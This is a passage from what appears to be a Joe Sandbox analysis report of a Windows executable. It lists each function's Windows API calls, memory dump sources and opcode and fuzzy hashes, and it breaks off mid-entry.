                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 64e1af50dc3d495845952ad83bddc38ed27acafe9b916fddbb6cf03d95095e28
                                                            • Instruction ID: 212d84b40ef7b5f41d04a28be7bdb69c1c8a18a6086eade3f498f84cf9543e71
                                                            • Opcode Fuzzy Hash: 64e1af50dc3d495845952ad83bddc38ed27acafe9b916fddbb6cf03d95095e28
                                                            • Instruction Fuzzy Hash: 1C21CF71500348AFF3309A65CC89BB7B7DCEB59324F100A1AFA95C26D1C778AC859675
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 004F9EC7
                                                            • GetLastError.KERNEL32 ref: 004F9ED4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 180097cf8dd5ea62092ccc6ad26953a93201754e6e1a59c69e150daab091bef0
                                                            • Instruction ID: 3789062f2375de9b7d3e59a588ac5cd07908aaec767293aa92c15aea8b4516d8
                                                            • Opcode Fuzzy Hash: 180097cf8dd5ea62092ccc6ad26953a93201754e6e1a59c69e150daab091bef0
                                                            • Instruction Fuzzy Hash: 3111E930600708ABD734DA34C884BB7B7E9AB45360F50462BE253D26E0D778ED4AC765
                                                            APIs
                                                            • _free.LIBCMT ref: 00518E75
                                                              • Part of subcall function 00518E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0051CA2C,00000000,?,00516CBE,?,00000008,?,005191E0,?,?,?), ref: 00518E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00531098,004F17CE,?,?,00000007,?,?,?,004F13D6,?,00000000), ref: 00518EB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: 84af773df39bac6b28eedb05541405b21695d49ec1a9e7927916b71b349ee06c
                                                            • Instruction ID: e4809763359cb7292af7deed3c8f4080231f19a0176cbcea32f6f414a3dcdf7d
                                                            • Opcode Fuzzy Hash: 84af773df39bac6b28eedb05541405b21695d49ec1a9e7927916b71b349ee06c
                                                            • Instruction Fuzzy Hash: 4DF0C23260120666FB312A25AC08BFF3F5CBFD2B70F244725F914AA191DF618DC091A1
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 005010AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 005010B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: dab2438caaf1285da5d1876a12e9cc415a7d2eaaf0a30c70944e9a11c9d5120f
                                                            • Instruction ID: 6544beecc1ef766d0d532c8e9d9b43f6357d103c7a7de52265c125395b00bc70
                                                            • Opcode Fuzzy Hash: dab2438caaf1285da5d1876a12e9cc415a7d2eaaf0a30c70944e9a11c9d5120f
                                                            • Instruction Fuzzy Hash: 94E09A32B0094AA7CF198BA49C2D8AF7AEEFB543443208179E443E3141F934EE464AA5
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004FA325,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA501
                                                              • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004FA325,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA532
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 0d1d4fbf53cefe337d286d46798ce50fcc621865f8dd350528815f7e67d3c239
                                                            • Instruction ID: 328333cef3696410d7c29f8c7e7c705158faecfe5c00dc42f19d7970f2e34fed
                                                            • Opcode Fuzzy Hash: 0d1d4fbf53cefe337d286d46798ce50fcc621865f8dd350528815f7e67d3c239
                                                            • Instruction Fuzzy Hash: 4EF0A03220020DBBDF015F60DC09FEA376DBF14385F448051B948D5160DB35DAD9EB64
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,004F977F,?,?,004F95CF,?,?,?,?,?,00522641,000000FF), ref: 004FA1F1
                                                              • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,004F977F,?,?,004F95CF,?,?,?,?,?,00522641), ref: 004FA21F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: 0635048e8adf66184eca997ff1ba807401ff826bc940b90e75109fbaa38681cf
                                                            • Instruction ID: 8603a0be111b61857d601880551fe2102c7d1d9d14c8b8b2fd6f8d9baa74b58c
                                                            • Opcode Fuzzy Hash: 0635048e8adf66184eca997ff1ba807401ff826bc940b90e75109fbaa38681cf
                                                            • Instruction Fuzzy Hash: F7E022312002096BEB009F20DC09FEA379CFF083C5F080062BA08D2150EB25EED9EA68
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00522641,000000FF), ref: 0050ACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00522641,000000FF), ref: 0050ACB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: e64ea2d697441c3b265be847a8e4c83b2250e577d0255035687df81c7938e592
                                                            • Instruction ID: ded5a7b2cdde21b746613cd7c8eb97a96d4a97db64cdff89eebe2317b25bb52c
                                                            • Opcode Fuzzy Hash: e64ea2d697441c3b265be847a8e4c83b2250e577d0255035687df81c7938e592
                                                            • Instruction Fuzzy Hash: 6FE06D76604A50EFCB119B58DC06B49FFA8FB89B20F10426AF416D37B0CF74B801CA90
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,004FA23A,?,004F755C,?,?,?,?), ref: 004FA254
                                                              • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,004FA23A,?,004F755C,?,?,?,?), ref: 004FA280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: d73f188fa2d67010de632fdb553c12f106f2b1c2ed6904e4ca4a86e94b10cb33
                                                            • Instruction ID: b337e14ee19360c40400a1e5c72d8c2502fcfbf30c8e948ef85bd8b3691365b9
                                                            • Opcode Fuzzy Hash: d73f188fa2d67010de632fdb553c12f106f2b1c2ed6904e4ca4a86e94b10cb33
                                                            • Instruction Fuzzy Hash: 5EE09B7150011897CB20AB64CC09BE97758BB193D1F044262FE44E3290D775DD45C6E5
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0050DEEC
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 0050DF03
                                                              • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                                              • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                                              • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010424,?), ref: 0050B59E
                                                              • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                                              • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 56cfb7b2c80465818c11cf8b5a917368ee556eb9ca101ba1c4094e8eb53a289e
                                                            • Instruction ID: 4e456abd90ec69a87d72a605bf0bdcc964ba2f06edbe828f89b0c0eb08cd9f17
                                                            • Opcode Fuzzy Hash: 56cfb7b2c80465818c11cf8b5a917368ee556eb9ca101ba1c4094e8eb53a289e
                                                            • Instruction Fuzzy Hash: 51E09B7240034D26EF01A761DC0AFAE3B6C6B15789F440855B304D71F3D97DDA549665
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00500836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004FF2D8,Crypt32.dll,00000000,004FF35C,?,?,004FF33E,?,?,?), ref: 00500858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: d5068b2deb11188c62d19fd246d7280c69deca33503b6981113dcf26ed82c607
                                                            • Instruction ID: 50a35c008fe70635ba2789db39ad0bde1044669275fe22d1d0ba8c8928beb7a6
                                                            • Opcode Fuzzy Hash: d5068b2deb11188c62d19fd246d7280c69deca33503b6981113dcf26ed82c607
                                                            • Instruction Fuzzy Hash: 1BE012765011186ADB11A795DC09FDA7BACFF09391F0404657645D2044D678DA858AF4
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0050A3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0050A3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: bc1efff45db0f73c66999af7831fbe9eb0a11e3fa9666d35118c97e543ffdb3a
                                                            • Instruction ID: 716c82aefbdda7bbaa20153bd0d49cd06b97948fd69c934b45519ec3fc30c975
                                                            • Opcode Fuzzy Hash: bc1efff45db0f73c66999af7831fbe9eb0a11e3fa9666d35118c97e543ffdb3a
                                                            • Instruction Fuzzy Hash: 20E0ED71501218EBCB10DF55C9456DDBFF8FF05360F20885AA85693281E374AE04DB91
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00512BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00512BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: 9fbc2cbf7098a0ccd15bd3a9a577eb9399871129a6e056e2e18a5a90625a5fe7
                                                            • Instruction ID: df76f163e97f49b456e25c06af9e39eecb761067b7720d6146e399de6d4fa5d8
                                                            • Opcode Fuzzy Hash: 9fbc2cbf7098a0ccd15bd3a9a577eb9399871129a6e056e2e18a5a90625a5fe7
                                                            • Instruction Fuzzy Hash: EED0A93829C202187E242A70282F4C92F45BE92BB5FA0868AE420C54C1EB1190E4A211
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 587628741e4180e843c1b4ebc0cf5516cf45d51950a47bd163c0a09250a4445b
                                                            • Instruction ID: 8216df5fbaefc9fd2bf7e8d8c01f328dc378b63c0af8c4d1b17136598744c707
                                                            • Opcode Fuzzy Hash: 587628741e4180e843c1b4ebc0cf5516cf45d51950a47bd163c0a09250a4445b
                                                            • Instruction Fuzzy Hash: 95C0123205C600BECB010BB4DC29C2BBBA8ABA5312F04C928B0A9C0060C238C114EB11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: df326a2390f21675804fdb052fedb2d103aa7f0a9e8feb3ec69fc49143672152
                                                            • Instruction ID: 90f1ec64da93d35c58fdd48bf2634d068da590c0282ebd66740a784ccab2db98
                                                            • Opcode Fuzzy Hash: df326a2390f21675804fdb052fedb2d103aa7f0a9e8feb3ec69fc49143672152
                                                            • Instruction Fuzzy Hash: F6C1C630A00258DFEF15CF68C494BBA7BA5AF15310F0801BFDE459B3A2DB39A945CB65
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: a041fb206d6897076abaf9594880876116696293f1499d5944ea7106963d98a2
                                                            • Instruction ID: 3adc6626ab5a28001ee35ff290c7adb90f76597a586da0c4f60bc6e5039498fd
                                                            • Opcode Fuzzy Hash: a041fb206d6897076abaf9594880876116696293f1499d5944ea7106963d98a2
                                                            • Instruction Fuzzy Hash: 3671C272500B899EDB25DF70C8559FBB7E9AF14305F40082FE3AB87241DA366684CF15
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F8289
                                                              • Part of subcall function 004F13DC: __EH_prolog.LIBCMT ref: 004F13E1
                                                              • Part of subcall function 004FA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004FA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: 2c772222917e10cffc1ce0b7f78bcc0254a6346ca77f7e7f2c36a1ec2236c363
                                                            • Instruction ID: 29f70c7eb36f4f46be9d62fcaa1a38d3d9b77f857fbe97fe868011f3096e4566
                                                            • Opcode Fuzzy Hash: 2c772222917e10cffc1ce0b7f78bcc0254a6346ca77f7e7f2c36a1ec2236c363
                                                            • Instruction Fuzzy Hash: 0E41D67190465C9ADB24DB61CC55AFAB7B8BF00304F0404EFE68A9B193EB795EC5CB14
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F13E1
                                                              • Part of subcall function 004F5E37: __EH_prolog.LIBCMT ref: 004F5E3C
                                                              • Part of subcall function 004FCE40: __EH_prolog.LIBCMT ref: 004FCE45
                                                              • Part of subcall function 004FB505: __EH_prolog.LIBCMT ref: 004FB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: f573108528189bbeffc839c8b487fbc45e5ac464a27726f28efa8778eea4b1db
